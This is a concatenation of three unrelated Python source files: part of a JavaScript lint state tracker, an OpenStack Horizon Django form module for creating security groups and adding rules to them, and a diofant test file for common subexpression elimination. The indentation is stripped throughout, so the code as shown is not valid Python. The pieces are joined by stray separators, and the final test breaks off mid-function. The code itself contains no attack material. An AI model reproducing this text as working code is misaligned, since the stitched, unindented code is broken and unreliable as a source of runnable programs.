last_token = None
contents = ''
doc_depth = 0
while not iterator.type in Type.FLAG_ENDING_TYPES or doc_depth > 0:
if (iterator.IsFirstInLine() and
DocFlag.EMPTY_COMMENT_LINE.match(iterator.line)):
# If we have a blank comment line, consider that an implicit
# ending of the description. This handles a case like:
#
# * @return {boolean} True
# *
# * Note: This is a sentence.
#
# The note is not part of the @return description, but there was
# no definitive ending token. Rather there was a line containing
# only a doc comment prefix or whitespace.
break
# b/2983692
# don't prematurely match against a @flag if inside a doc flag
# need to think about what is the correct behavior for unterminated
# inline doc flags
if (iterator.type == Type.DOC_START_BRACE and
iterator.next.type == Type.DOC_INLINE_FLAG):
doc_depth += 1
elif (iterator.type == Type.DOC_END_BRACE and
doc_depth > 0):
doc_depth -= 1
if iterator.type in Type.FLAG_DESCRIPTION_TYPES:
contents += iterator.string
last_token = iterator
iterator = iterator.next
if iterator.line_number != last_line:
contents += '\n'
last_line = iterator.line_number
end_token = last_token
if DocFlag.EMPTY_STRING.match(contents):
contents = None
else:
# Strip trailing newline.
contents = contents[:-1]
return end_token, contents
class Function(object):
"""Data about a JavaScript function.
Attributes:
block_depth: Block depth the function began at.
doc: The DocComment associated with the function.
has_return: If the function has a return value.
has_this: If the function references the 'this' object.
is_assigned: If the function is part of an assignment.
is_constructor: If the function is a constructor.
name: The name of the function, whether given in the function keyword or
as the lvalue the function is assigned to.
"""
def __init__(self, block_depth, is_assigned, doc, name):
self.block_depth = block_depth
self.is_assigned = is_assigned
self.is_constructor = doc and doc.HasFlag('constructor')
self.is_interface = doc and doc.HasFlag('interface')
self.has_return = False
self.has_throw = False
self.has_this = False
self.name = name
self.doc = doc
class StateTracker(object):
"""EcmaScript state tracker.
Tracks block depth, function names, etc. within an EcmaScript token stream.
"""
OBJECT_LITERAL = 'o'
CODE = 'c'
def __init__(self, doc_flag=DocFlag):
"""Initializes a JavaScript token stream state tracker.
Args:
doc_flag: An optional custom DocFlag used for validating
documentation flags.
"""
self._doc_flag = doc_flag
self.Reset()
def Reset(self):
"""Resets the state tracker to prepare for processing a new page."""
self._block_depth = 0
self._is_block_close = False
self._paren_depth = 0
self._functions = []
self._functions_by_name = {}
self._last_comment = None
self._doc_comment = None
self._cumulative_params = None
self._block_types = []
self._last_non_space_token = None
self._last_line = None
self._first_token = None
self._documented_identifiers = set()
def InFunction(self):
"""Returns true if the current token is within a function.
Returns:
True if the current token is within a function.
"""
return bool(self._functions)
def InConstructor(self):
"""Returns true if the current token is within a constructor.
Returns:
True if the current token is within a constructor.
"""
return self.InFunction() and self._functions[-1].is_constructor
def InInterfaceMethod(self):
"""Returns true if the current token is within an interface method.
Returns:
True if the current token is within an interface method.
"""
if self.InFunction():
if self._functions[-1].is_interface:
return True
else:
name = self._functions[-1].name
prototype_index = name.find('.prototype.')
if prototype_index != -1:
class_function_name = name[0:prototype_index]
if (class_function_name in self._functions_by_name and
self._functions_by_name[class_function_name].is_interface):
return True
return False
def InTopLevelFunction(self):
"""Returns true if the current token is within a top level function.
Returns:
True if the current token is within a top level function.
"""
return len(self._functions) == 1 and self.InTopLevel()
def InAssignedFunction(self):
"""Returns true if the current token is within a function variable.
Returns:
True if if the current token is within a function variable
"""
return self.InFunction() and self._functions[-1].is_assigned
def IsFunctionOpen(self):
"""Returns true if the current token is a function block open.
Returns:
True if the current token is a function block open.
"""
return (self._functions and
self._functions[-1].block_depth == self._block_depth - 1)
def IsFunctionClose(self):
"""Returns true if the current token is a function block close.
Returns:
True if the current token is a function block close.
"""
return (self._functions and
self._functions[-1].block_depth == self._block_depth)
def InBlock(self):
"""Returns true if the current token is within a block.
Returns:
True if the current token is within a block.
"""
return bool(self._block_depth)
def IsBlockClose(self):
"""Returns true if the current token is a block close.
Returns:
True if the current token is a block close.
"""
return self._is_block_close
def InObjectLiteral(self):
"""Returns true if the current token is within an object literal.
Returns:
True if the current token is within an object literal.
"""
return self._block_depth and self._block_types[-1] == self.OBJECT_LITERAL
def InObjectLiteralDescendant(self):
"""Returns true if the current token has an object literal ancestor.
Returns:
True if the current token has an object literal ancestor.
"""
return self.OBJECT_LITERAL in self._block_types
def InParentheses(self):
"""Returns true if the current token is within parentheses.
Returns:
True if the current token is within parentheses.
"""
return bool(self._paren_depth)
def InTopLevel(self):
"""Whether we are at the top level in the class.
This function call is language specific. In some languages like
JavaScript, a function is top level if it is not inside any parenthesis.
In languages such as ActionScript, a function is top level if it is directly
within a class.
"""
raise TypeError('Abstract method InTopLevel not implemented')
def GetBlockType(self, token):
"""Determine the block type given a START_BLOCK token.
Code blocks come after parameters, keywords like else, and closing parens.
Args:
token: The current token. Can be assumed to be type START_BLOCK.
Returns:
Code block type for current token.
"""
raise TypeError('Abstract method GetBlockType not implemented')
def GetParams(self):
"""Returns the accumulated input params as an array.
In some EcmasSript languages, input params are specified like
(param:Type, param2:Type2, ...)
in other they are specified just as
(param, param2)
We handle both formats for specifying parameters here and leave
it to the compilers for each language to detect compile errors.
This allows more code to be reused between lint checkers for various
EcmaScript languages.
Returns:
The accumulated input params as an array.
"""
params = []
if self._cumulative_params:
params = re.compile(r'\s+').sub('', self._cumulative_params).split(',')
# Strip out the type from parameters of the form name:Type.
params = map(lambda param: param.split(':')[0], params)
return params
def GetLastComment(self):
"""Return the last plain comment that could be used as documentation.
Returns:
The last plain comment that could be used as documentation.
"""
return self._last_comment
def GetDocComment(self):
"""Return the most recent applicable documentation comment.
Returns:
The last applicable documentation comment.
"""
return self._doc_comment
def HasDocComment(self, identifier):
"""Returns whether the identifier has been documented yet.
Args:
identifier: The identifier.
Returns:
Whether the identifier has been documented yet.
"""
return identifier in self._documented_identifiers
def InDocComment(self):
"""Returns whether the current token is in a doc comment.
Returns:
Whether the current token is in a doc comment.
"""
return self._doc_comment and self._doc_comment.end_token is None
def GetDocFlag(self):
"""Returns the current documentation flags.
Returns:
The current documentation flags.
"""
return self._doc_flag
def IsTypeToken(self, t):
if self.InDocComment() and t.type not in (Type.START_DOC_COMMENT,
Type.DOC_FLAG, Type.DOC_INLINE_FLAG, Type.DOC_PREFIX):
f = tokenutil.SearchUntil(t, [Type.DOC_FLAG], [Type.START_DOC_COMMENT],
None, True)
if f and f.attached_object.type_start_token is not None:
return (tokenutil.Compare(t, f.attached_object.type_start_token) > 0 and
tokenutil.Compare(t, f.attached_object.type_end_token) < 0)
return False
def GetFunction(self):
"""Return the function the current code block is a part of.
Returns:
The current Function object.
"""
if self._functions:
return self._functions[-1]
def GetBlockDepth(self):
"""Return the block depth.
Returns:
The current block depth.
"""
return self._block_depth
def GetLastNonSpaceToken(self):
"""Return the last non whitespace token."""
return self._last_non_space_token
def GetLastLine(self):
"""Return the last line."""
return self._last_line
def GetFirstToken(self):
"""Return the very first token in the file."""
return self._first_token
def HandleToken(self, token, last_non_space_token):
"""Handles the given token and updates state.
Args:
token: The token to handle.
last_non_space_token:
"""
self._is_block_close = False
if not self._first_token:
self._first_token = token
# Track block depth.
type = token.type
if type == Type.START_BLOCK:
self._block_depth += 1
# Subclasses need to handle block start very differently because
# whether a block is a CODE or OBJECT_LITERAL block varies significantly
# by language.
self._block_types.append(self.GetBlockType(token))
# Track block depth.
elif type == Type.END_BLOCK:
self._is_block_close = not self.InObjectLiteral()
self._block_depth -= 1
self._block_types.pop()
# Track parentheses depth.
elif type == Type.START_PAREN:
self._paren_depth += 1
# Track parentheses depth.
elif type == Type.END_PAREN:
self._paren_depth -= 1
elif type == Type.COMMENT:
self._last_comment = token.string
elif type == Type.START_DOC_COMMENT:
self._last_comment = None
self._doc_comment = DocComment(token)
elif type == Type.END_DOC_COMMENT:
self._doc_comment.end_token = token
elif type in (Type.DOC_FLAG, Type.DOC_INLINE_FLAG):
flag = self._doc_flag(token)
token.attached_object = flag
self._doc_comment.AddFlag(flag)
if flag.flag_type == 'param' and flag.name:
self._doc_comment.AddParam(flag.name, flag.type)
elif flag.flag_type == 'suppress':
self._doc_comment.AddSuppression(token)
elif type == Type.FUNCTION_DECLARATION:
last_code = tokenutil.SearchExcept(token, Type.NON_CODE_TYPES, None,
True)
doc = None
# Only functions outside of parens are eligible for documentation.
if not self._paren_depth:
doc = self._doc_comment
name = ''
is_assigned = last_code and (last_code.IsOperator('=') or
last_code.IsOperator('||') or last_code.IsOperator('&&') or
(last_code.IsOperator(':') and not self.InObjectLiteral()))
if is_assigned:
# TODO(robbyw): This breaks for x[2] = ...
# Must use loop to find full function name in the case of line-wrapped
# declarations (bug 1220601) like:
# my.function.foo.
# bar = function() ...
identifier = tokenutil.Search(last_code, Type.SIMPLE_LVALUE, None, True)
while identifier and identifier.type in (
Type.IDENTIFIER, Type.SIMPLE_LVALUE):
name = identifier.string + name
# Traverse behind us, skipping whitespace and comments.
while True:
identifier = identifier.previous
if not identifier or not identifier.type in Type.NON_CODE_TYPES:
break
else:
next_token = tokenutil.SearchExcept(token, Type.NON_CODE_TYPES)
while next_token and next_token.IsType(Type.FUNCTION_NAME):
name += next_token.string
next_token = tokenutil.Search(next_token, Type.FUNCTION_NAME, 2)
function = Function(self._block_depth, is_assigned, doc, name)
self._functions.append(function)
self._functions_by_name[name] = function
elif type == Type.START_PARAMETERS:
self._cumulative_params = ''
elif type == Type.PARAMETERS:
self._cumulative_params += token.string
elif type == Type.KEYWORD and token.string == 'return':
next_token = tokenutil.SearchExcept(token, Type.NON_CODE_TYPES)
if not next_token.IsType(Type.SEMICOLON):
function = self.GetFunction()
if function:
function.has_return = True
elif type == Type.KEYWORD and token.string == 'throw':
function = self.GetFunction()
if function:
function.has_throw = True
elif type == Type.SIMPLE_LVALUE:
identifier = token.values['identifier']
jsdoc = self.GetDocComment()
if jsdoc:
self._documented_identifiers.add(identifier)
self._HandleIdentifier(identifier, True)
elif type == Type.IDENTIFIER:
self._HandleIdentifier(token.string, False)
# Detect documented non-assignments.
next_token = tokenutil.SearchExcept(token, Type.NON_CODE_TYPES)
if next_token.IsType(Type.SEMICOLON):
if (self._last_non_space_token and
self._last_non_space_token.IsType(Type.END_DOC_COMMENT)):
self._documented_identifiers.add(token.string)
def _HandleIdentifier(self, identifier, is_assignment):
"""Process the given identifier.
Currently checks if it references 'this' and annotates the function
accordingly.
Args:
identifier: The identifer to process.
is_assignment: Whether the identifer is being written to.
"""
if identifier == 'this' or identifier.startswith('this.'):
function = self.GetFunction()
if function:
function.has_this = True
def HandleAfterToken(self, token):
"""Handle updating state after a token has been checked.
This function should be used for destructive state changes such as
deleting a tracked object.
Args:
token: The token to handle.
"""
type = token.type
if type == Type.SEMICOLON or type == Type.END_PAREN or (
type == Type.END_BRACKET and
self._last_non_space_token.type not in (
Type.SINGLE_QUOTE_STRING_END, Type.DOUBLE_QUOTE_STRING_END)):
# We end on any numeric array index, but keep going for string based
# array indices so that we pick up manually exported identifiers.
self._doc_comment = None
self._last_comment = None
elif type == Type.END_BLOCK:
self._doc_comment = None
self._last_comment = None
if self.InFunction() and self.IsFunctionClose():
# TODO(robbyw): Detect the function's name for better errors.
self._functions.pop()
elif type == Type.END_PARAMETERS and self._doc_comment:
self._doc_comment = None
self._last_comment = None
if not token.IsAnyType(Type.WHITESPACE, Type.BLANK_LINE):
self._last_non_space_token = token
self._last_line = token.line
| |
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2012 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
#
# Copyright 2012 Nebula, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import logging
import netaddr
from django.conf import settings # noqa
from django.core.urlresolvers import reverse # noqa
from django.core import validators
from django.forms import ValidationError # noqa
from django.utils.translation import ugettext_lazy as _ # noqa
from horizon import exceptions
from horizon import forms
from horizon import messages
from horizon.utils import fields
from horizon.utils import validators as utils_validators
from openstack_dashboard import api
from openstack_dashboard.utils import filters
LOG = logging.getLogger(__name__)
class CreateGroup(forms.SelfHandlingForm):
name = forms.CharField(label=_("Name"),
error_messages={
'required': _('This field is required.'),
'invalid': _("The string may only contain"
" ASCII characters and numbers.")},
validators=[validators.validate_slug])
description = forms.CharField(label=_("Description"))
def handle(self, request, data):
try:
sg = api.network.security_group_create(request,
data['name'],
data['description'])
messages.success(request,
_('Successfully created security group: %s')
% data['name'])
return sg
except Exception:
redirect = reverse("horizon:project:access_and_security:index")
exceptions.handle(request,
_('Unable to create security group.'),
redirect=redirect)
class UpdateGroup(forms.SelfHandlingForm):
id = forms.CharField(widget=forms.HiddenInput())
name = forms.CharField(label=_("Name"),
error_messages={
'required': _('This field is required.'),
'invalid': _("The string may only contain"
" ASCII characters and numbers.")},
validators=[validators.validate_slug])
description = forms.CharField(label=_("Description"))
def handle(self, request, data):
try:
sg = api.network.security_group_update(request,
data['id'],
data['name'],
data['description'])
messages.success(request,
_('Successfully updated security group: %s')
% data['name'])
return sg
except Exception:
redirect = reverse("horizon:project:access_and_security:index")
exceptions.handle(request,
_('Unable to update security group.'),
redirect=redirect)
class AddRule(forms.SelfHandlingForm):
id = forms.CharField(widget=forms.HiddenInput())
rule_menu = forms.ChoiceField(label=_('Rule'),
widget=forms.Select(attrs={
'class': 'switchable',
'data-slug': 'rule_menu'}))
# "direction" field is enabled only when custom mode.
# It is because most common rules in local_settings.py is meaningful
# when its direction is 'ingress'.
direction = forms.ChoiceField(
label=_('Direction'),
required=False,
widget=forms.Select(attrs={
'class': 'switched',
'data-switch-on': 'rule_menu',
'data-rule_menu-tcp': _('Direction'),
'data-rule_menu-udp': _('Direction'),
'data-rule_menu-icmp': _('Direction'),
'data-rule_menu-custom': _('Direction'),
'data-rule_menu-all_tcp': _('Direction'),
'data-rule_menu-all_udp': _('Direction'),
'data-rule_menu-all_icmp': _('Direction'),
}))
ip_protocol = forms.IntegerField(
label=_('IP Protocol'), required=False,
help_text=_("Enter an integer value between 0 and 255 "
"(or -1 which means wildcard)."),
validators=[utils_validators.validate_ip_protocol],
widget=forms.TextInput(attrs={
'class': 'switched',
'data-switch-on': 'rule_menu',
'data-rule_menu-custom': _('IP Protocol')}))
port_or_range = forms.ChoiceField(
label=_('Open Port'),
choices=[('port', _('Port')),
('range', _('Port Range'))],
widget=forms.Select(attrs={
'class': 'switchable switched',
'data-slug': 'range',
'data-switch-on': 'rule_menu',
'data-rule_menu-tcp': _('Open Port'),
'data-rule_menu-udp': _('Open Port')}))
port = forms.IntegerField(label=_("Port"),
required=False,
help_text=_("Enter an integer value "
"between 1 and 65535."),
widget=forms.TextInput(attrs={
'class': 'switched',
'data-switch-on': 'range',
'data-range-port': _('Port')}),
validators=[
utils_validators.validate_port_range])
from_port = forms.IntegerField(label=_("From Port"),
required=False,
help_text=_("Enter an integer value "
"between 1 and 65535."),
widget=forms.TextInput(attrs={
'class': 'switched',
'data-switch-on': 'range',
'data-range-range': _('From Port')}),
validators=[
utils_validators.validate_port_range])
to_port = forms.IntegerField(label=_("To Port"),
required=False,
help_text=_("Enter an integer value "
"between 1 and 65535."),
widget=forms.TextInput(attrs={
'class': 'switched',
'data-switch-on': 'range',
'data-range-range': _('To Port')}),
validators=[
utils_validators.validate_port_range])
icmp_type = forms.IntegerField(label=_("Type"),
required=False,
help_text=_("Enter a value for ICMP type "
"in the range (-1: 255)"),
widget=forms.TextInput(attrs={
'class': 'switched',
'data-switch-on': 'rule_menu',
'data-rule_menu-icmp': _('Type')}),
validators=[
utils_validators.validate_port_range])
icmp_code = forms.IntegerField(label=_("Code"),
required=False,
help_text=_("Enter a value for ICMP code "
"in the range (-1: 255)"),
widget=forms.TextInput(attrs={
'class': 'switched',
'data-switch-on': 'rule_menu',
'data-rule_menu-icmp': _('Code')}),
validators=[
utils_validators.validate_port_range])
remote = forms.ChoiceField(label=_('Remote'),
choices=[('cidr', _('CIDR')),
('sg', _('Security Group'))],
help_text=_('To specify an allowed IP '
'range, select "CIDR". To '
'allow access from all '
'members of another security '
'group select "Security '
'Group".'),
widget=forms.Select(attrs={
'class': 'switchable',
'data-slug': 'remote'}))
cidr = fields.IPField(label=_("CIDR"),
required=False,
initial="0.0.0.0/0",
help_text=_("Classless Inter-Domain Routing "
"(e.g. 192.168.0.0/24)"),
version=fields.IPv4 | fields.IPv6,
mask=True,
widget=forms.TextInput(
attrs={'class': 'switched',
'data-switch-on': 'remote',
'data-remote-cidr': _('CIDR')}))
security_group = forms.ChoiceField(label=_('Security Group'),
required=False,
widget=forms.Select(attrs={
'class': 'switched',
'data-switch-on': 'remote',
'data-remote-sg': _('Security '
'Group')}))
# When cidr is used ethertype is determined from IP version of cidr.
# When source group, ethertype needs to be specified explicitly.
ethertype = forms.ChoiceField(label=_('Ether Type'),
required=False,
choices=[('IPv4', _('IPv4')),
('IPv6', _('IPv6'))],
widget=forms.Select(attrs={
'class': 'switched',
'data-slug': 'ethertype',
'data-switch-on': 'remote',
'data-remote-sg': _('Ether Type')}))
def __init__(self, *args, **kwargs):
sg_list = kwargs.pop('sg_list', [])
super(AddRule, self).__init__(*args, **kwargs)
# Determine if there are security groups available for the
# remote group option; add the choices and enable the option if so.
if sg_list:
security_groups_choices = sg_list
else:
security_groups_choices = [("", _("No security groups available"))]
self.fields['security_group'].choices = security_groups_choices
backend = api.network.security_group_backend(self.request)
rules_dict = getattr(settings, 'SECURITY_GROUP_RULES', [])
common_rules = [(k, _(rules_dict[k]['name']))
for k in rules_dict
if rules_dict[k].get('backend', backend) == backend]
common_rules.sort()
custom_rules = [('tcp', _('Custom TCP Rule')),
('udp', _('Custom UDP Rule')),
('icmp', _('Custom ICMP Rule'))]
if backend == 'neutron':
custom_rules.append(('custom', _('Other Protocol')))
self.fields['rule_menu'].choices = custom_rules + common_rules
self.rules = rules_dict
if backend == 'neutron':
self.fields['direction'].choices = [('ingress', _('Ingress')),
('egress', _('Egress'))]
else:
# direction and ethertype are not supported in Nova secgroup.
self.fields['direction'].widget = forms.HiddenInput()
self.fields['ethertype'].widget = forms.HiddenInput()
# ip_protocol field is to specify arbitrary protocol number
# and it is available only for neutron security group.
self.fields['ip_protocol'].widget = forms.HiddenInput()
def clean(self):
cleaned_data = super(AddRule, self).clean()
rule_menu = cleaned_data.get('rule_menu')
port_or_range = cleaned_data.get("port_or_range")
remote = cleaned_data.get("remote")
icmp_type = cleaned_data.get("icmp_type", None)
icmp_code = cleaned_data.get("icmp_code", None)
from_port = cleaned_data.get("from_port", None)
to_port = cleaned_data.get("to_port", None)
port = cleaned_data.get("port", None)
if rule_menu == 'icmp':
cleaned_data['ip_protocol'] = rule_menu
if icmp_type is None:
msg = _('The ICMP type is invalid.')
raise ValidationError(msg)
if icmp_code is None:
msg = _('The ICMP code is invalid.')
raise ValidationError(msg)
if icmp_type not in xrange(-1, 256):
msg = _('The ICMP type not in range (-1, 255)')
raise ValidationError(msg)
if icmp_code not in xrange(-1, 256):
msg = _('The ICMP code not in range (-1, 255)')
raise ValidationError(msg)
cleaned_data['from_port'] = icmp_type
cleaned_data['to_port'] = icmp_code
elif rule_menu == 'tcp' or rule_menu == 'udp':
cleaned_data['ip_protocol'] = rule_menu
if port_or_range == "port":
cleaned_data["from_port"] = port
cleaned_data["to_port"] = port
if port is None:
msg = _('The specified port is invalid.')
raise ValidationError(msg)
else:
if from_port is None:
msg = _('The "from" port number is invalid.')
raise ValidationError(msg)
if to_port is None:
msg = _('The "to" port number is invalid.')
raise ValidationError(msg)
if to_port < from_port:
msg = _('The "to" port number must be greater than '
'or equal to the "from" port number.')
raise ValidationError(msg)
elif rule_menu == 'custom':
pass
else:
cleaned_data['ip_protocol'] = self.rules[rule_menu]['ip_protocol']
cleaned_data['from_port'] = int(self.rules[rule_menu]['from_port'])
cleaned_data['to_port'] = int(self.rules[rule_menu]['to_port'])
cleaned_data['direction'] = self.rules[rule_menu].get('direction')
# NOTE(amotoki): There are two cases where cleaned_data['direction']
# is empty: (1) Nova Security Group is used. Since "direction" is
# HiddenInput, direction field exists but its value is ''.
# (2) Template is used. In this case, the default value is None.
# To make sure 'direction' field has 'ingress' or 'egress',
# fill this field here if it is not specified.
if not cleaned_data['direction']:
cleaned_data['direction'] = 'ingress'
if remote == "cidr":
cleaned_data['security_group'] = None
else:
cleaned_data['cidr'] = None
# If cleaned_data does not contain cidr, cidr is already marked
# as invalid, so skip the further validation for cidr.
# In addition cleaned_data['cidr'] is None means source_group is used.
if 'cidr' in cleaned_data and cleaned_data['cidr'] is not None:
cidr = cleaned_data['cidr']
if not cidr:
msg = _('CIDR must be specified.')
self._errors['cidr'] = self.error_class([msg])
else:
# If cidr is specified, ethertype is determined from IP address
# version. It is used only when Neutron is enabled.
ip_ver = netaddr.IPNetwork(cidr).version
cleaned_data['ethertype'] = 'IPv6' if ip_ver == 6 else 'IPv4'
return cleaned_data
def handle(self, request, data):
try:
rule = api.network.security_group_rule_create(
request,
filters.get_int_or_uuid(data['id']),
data['direction'],
data['ethertype'],
data['ip_protocol'],
data['from_port'],
data['to_port'],
data['cidr'],
data['security_group'])
messages.success(request,
_('Successfully added rule: %s') % unicode(rule))
return rule
except Exception:
redirect = reverse("horizon:project:access_and_security:"
"security_groups:detail", args=[data['id']])
exceptions.handle(request,
_('Unable to add rule to security group.'),
redirect=redirect)
| |
import itertools
import pytest
from diofant import (Add, Eq, Function, Idx, ImmutableDenseMatrix,
ImmutableSparseMatrix, IndexedBase, Matrix, MatrixSymbol,
MutableDenseMatrix, MutableSparseMatrix, O, Piecewise,
Pow, Rational, RootOf, Subs, Symbol, Tuple, cos, cse, exp,
meijerg, sin, sqrt, symbols, sympify, true)
from diofant.abc import a, b, w, x, y, z
from diofant.simplify import cse_main, cse_opts
from diofant.simplify.cse_opts import sub_post, sub_pre
__all__ = ()
x0, x1, x2, x3, x4, x5, x6, x7, x8, x9, x10, x11, x12 = symbols('x:13')
def test_numbered_symbols():
ns = cse_main.numbered_symbols(prefix='y')
assert list(itertools.islice(
ns, 0, 10)) == [Symbol(f'y{i}') for i in range(10)]
ns = cse_main.numbered_symbols(prefix='y')
assert list(itertools.islice(
ns, 10, 20)) == [Symbol(f'y{i}') for i in range(10, 20)]
ns = cse_main.numbered_symbols()
assert list(itertools.islice(
ns, 0, 10)) == [Symbol(f'x{i}') for i in range(10)]
# Dummy "optimization" functions for testing.
def opt1(expr):
return expr + y
def opt2(expr):
return expr*z
def test_preprocess_for_cse():
assert cse_main.preprocess_for_cse(x, [(opt1, None)]) == x + y
assert cse_main.preprocess_for_cse(x, [(None, opt1)]) == x
assert cse_main.preprocess_for_cse(x, [(None, None)]) == x
assert cse_main.preprocess_for_cse(x, [(opt1, opt2)]) == x + y
assert cse_main.preprocess_for_cse(
x, [(opt1, None), (opt2, None)]) == (x + y)*z
def test_postprocess_for_cse():
assert cse_main.postprocess_for_cse(x, [(opt1, None)]) == x
assert cse_main.postprocess_for_cse(x, [(None, opt1)]) == x + y
assert cse_main.postprocess_for_cse(x, [(None, None)]) == x
assert cse_main.postprocess_for_cse(x, [(opt1, opt2)]) == x*z
# Note the reverse order of application.
assert cse_main.postprocess_for_cse(
x, [(None, opt1), (None, opt2)]) == x*z + y
def test_cse_single():
# Simple substitution.
e = Add(Pow(x + y, 2), sqrt(x + y))
substs, reduced = cse([e])
assert substs == [(x0, x + y)]
assert reduced == [sqrt(x0) + x0**2]
assert cse([e], order='none') == cse([e])
def test_cse_single2():
# Simple substitution, test for being able to pass the expression directly
e = Add(Pow(x + y, 2), sqrt(x + y))
substs, reduced = cse(e)
assert substs == [(x0, x + y)]
assert reduced == [sqrt(x0) + x0**2]
substs, reduced = cse(Matrix([[1]]))
assert isinstance(reduced[0], Matrix)
def test_cse_not_possible():
# No substitution possible.
e = Add(x, y)
substs, reduced = cse([e])
assert not substs
assert reduced == [x + y]
# issue sympy/sympy#6329
eq = (meijerg((1, 2), (y, 4), (5,), [], x) +
meijerg((1, 3), (y, 4), (5,), [], x))
assert cse(eq) == ([], [eq])
def test_nested_substitution():
# Substitution within a substitution.
e = Add(Pow(w*x + y, 2), sqrt(w*x + y))
substs, reduced = cse([e])
assert substs == [(x0, w*x + y)]
assert reduced == [sqrt(x0) + x0**2]
def test_subtraction_opt():
# Make sure subtraction is optimized.
e = (x - y)*(z - y) + exp((x - y)*(z - y))
substs, reduced = cse(
[e], optimizations=[(cse_opts.sub_pre, cse_opts.sub_post)])
assert substs == [(x0, (x - y)*(y - z))]
assert reduced == [-x0 + exp(-x0)]
e = -(x - y)*(z - y) + exp(-(x - y)*(z - y))
substs, reduced = cse(
[e], optimizations=[(cse_opts.sub_pre, cse_opts.sub_post)])
assert substs == [(x0, (x - y)*(y - z))]
assert reduced == [x0 + exp(x0)]
# issue sympy/sympy#4077
n = -1 + 1/x
e = n/x/(-n)**2 - 1/n/x
assert cse(e, optimizations=[(cse_opts.sub_pre, cse_opts.sub_post)]) == \
([], [0])
def test_multiple_expressions():
e1 = (x + y)*z
e2 = (x + y)*w
substs, reduced = cse([e1, e2])
assert substs == [(x0, x + y)]
assert reduced == [x0*z, x0*w]
l = [w*x*y + z, w*y]
substs, reduced = cse(l)
rsubsts, _ = cse(reversed(l))
assert substs == rsubsts
assert reduced == [z + x*x0, x0]
l = [w*x*y, w*x*y + z, w*y]
substs, reduced = cse(l)
rsubsts, _ = cse(reversed(l))
assert substs == rsubsts
assert reduced == [x1, x1 + z, x0]
l = [(x - z)*(y - z), x - z, y - z]
substs, reduced = cse(l)
rsubsts, _ = cse(reversed(l))
assert substs == [(x0, -z), (x1, x + x0), (x2, x0 + y)]
assert rsubsts == [(x0, -z), (x1, x0 + y), (x2, x + x0)]
assert reduced == [x1*x2, x1, x2]
l = [w*y + w + x + y + z, w*x*y]
assert cse(l) == ([(x0, w*y)], [w + x + x0 + y + z, x*x0])
assert cse([x + y, x + y + z]) == ([(x0, x + y)], [x0, z + x0])
assert cse([x + y, x + z]) == ([], [x + y, x + z])
assert cse([x*y, z + x*y, x*y*z + 3]) == \
([(x0, x*y)], [x0, z + x0, 3 + x0*z])
def test_non_commutative_cse():
A, B, C = symbols('A B C', commutative=False)
l = [A*B*C, A*C]
assert cse(l) == ([], l)
@pytest.mark.xfail
def test_non_commutative_cse_mul():
x0 = symbols('x0', commutative=False)
A, B, C = symbols('A B C', commutative=False)
l = [A*B*C, A*B]
assert cse(l) == ([(x0, A*B)], [x0*C, x0])
# Test if CSE of non-commutative Mul terms is disabled
def test_bypass_non_commutatives():
A, B, C = symbols('A B C', commutative=False)
l = [A*B*C, A*C]
assert cse(l) == ([], l)
l = [A*B*C, A*B]
assert cse(l) == ([], l)
l = [B*C, A*B*C]
assert cse(l) == ([], l)
def test_non_commutative_order():
A, B, C = symbols('A B C', commutative=False)
x0 = symbols('x0', commutative=False)
l = [B+C, A*(B+C)]
assert cse(l) == ([(x0, B+C)], [x0, A*x0])
l = [(A - B)**2 + A - B]
assert cse(l) == ([(x0, A - B)], [x0**2 + x0])
@pytest.mark.xfail
def test_powers():
assert cse(x*y**2 + x*y) == ([(x0, x*y)], [x0*y + x0])
def test_basic_optimization():
# issue sympy/sympy#4498
assert cse(w/(x - y) + z/(y - x), optimizations='basic') == \
([], [(w - z)/(x - y)])
def test_sympyissue_4020():
assert cse(x**5 + x**4 + x**3 + x**2, optimizations='basic') \
== ([(x0, x**2)], [x0*(x**3 + x + x0 + 1)])
def test_sympyissue_4203():
assert cse(sin(x**x)/x**x) == ([(x0, x**x)], [sin(x0)/x0])
def test_sympyissue_6263():
e = Eq(x*(-x + 1) + x*(x - 1), 0)
assert cse(e, optimizations='basic') == ([], [True])
def test_dont_cse_tuples():
f = Function('f')
g = Function('g')
name_val, (expr,) = cse(Subs(f(x, y), (x, 0), (y, 1)) +
Subs(g(x, y), (x, 0), (y, 1)))
assert not name_val
assert expr == (Subs(f(x, y), (x, 0), (y, 1))
+ Subs(g(x, y), (x, 0), (y, 1)))
name_val, (expr,) = cse(Subs(f(x, y), (x, 0), (y, x + y)) +
Subs(g(x, y), (x, 0), (y, x + y)))
assert name_val == [(x0, x + y)]
assert expr == Subs(f(x, y), (x, 0), (y, x0)) + Subs(g(x, y), (x, 0), (y, x0))
def test_pow_invpow():
assert cse(1/x**2 + x**2) == \
([(x0, x**2)], [x0 + 1/x0])
assert cse(x**2 + (1 + 1/x**2)/x**2) == \
([(x0, x**2), (x1, 1/x0)], [x0 + x1*(x1 + 1)])
assert cse(1/x**2 + (1 + 1/x**2)*x**2) == \
([(x0, x**2), (x1, 1/x0)], [x0*(x1 + 1) + x1])
assert cse(cos(1/x**2) + sin(1/x**2)) == \
([(x0, x**(-2))], [sin(x0) + cos(x0)])
assert cse(cos(x**2) + sin(x**2)) == \
([(x0, x**2)], [sin(x0) + cos(x0)])
assert cse(y/(2 + x**2) + z/x**2/y) == \
([(x0, x**2)], [y/(x0 + 2) + z/(x0*y)])
assert cse(exp(x**2) + x**2*cos(1/x**2)) == \
([(x0, x**2)], [x0*cos(1/x0) + exp(x0)])
assert cse((1 + 1/x**2)/x**2) == \
([(x0, x**(-2))], [x0*(x0 + 1)])
assert cse(x**(2*y) + x**(-2*y)) == \
([(x0, x**(2*y))], [x0 + 1/x0])
def test_postprocess():
eq = (x + 1 + exp((x + 1)/(y + 1)) + cos(y + 1))
assert cse([eq, Eq(x, z + 1), z - 2, (z + 1)*(x + 1)],
postprocess=cse_main.cse_separate) == \
[[(x1, y + 1), (x2, z + 1), (x, x2), (x0, x + 1)],
[x0 + exp(x0/x1) + cos(x1), z - 2, x0*x2]]
def test_sympyissue_4499():
# previously, this gave 16 constants
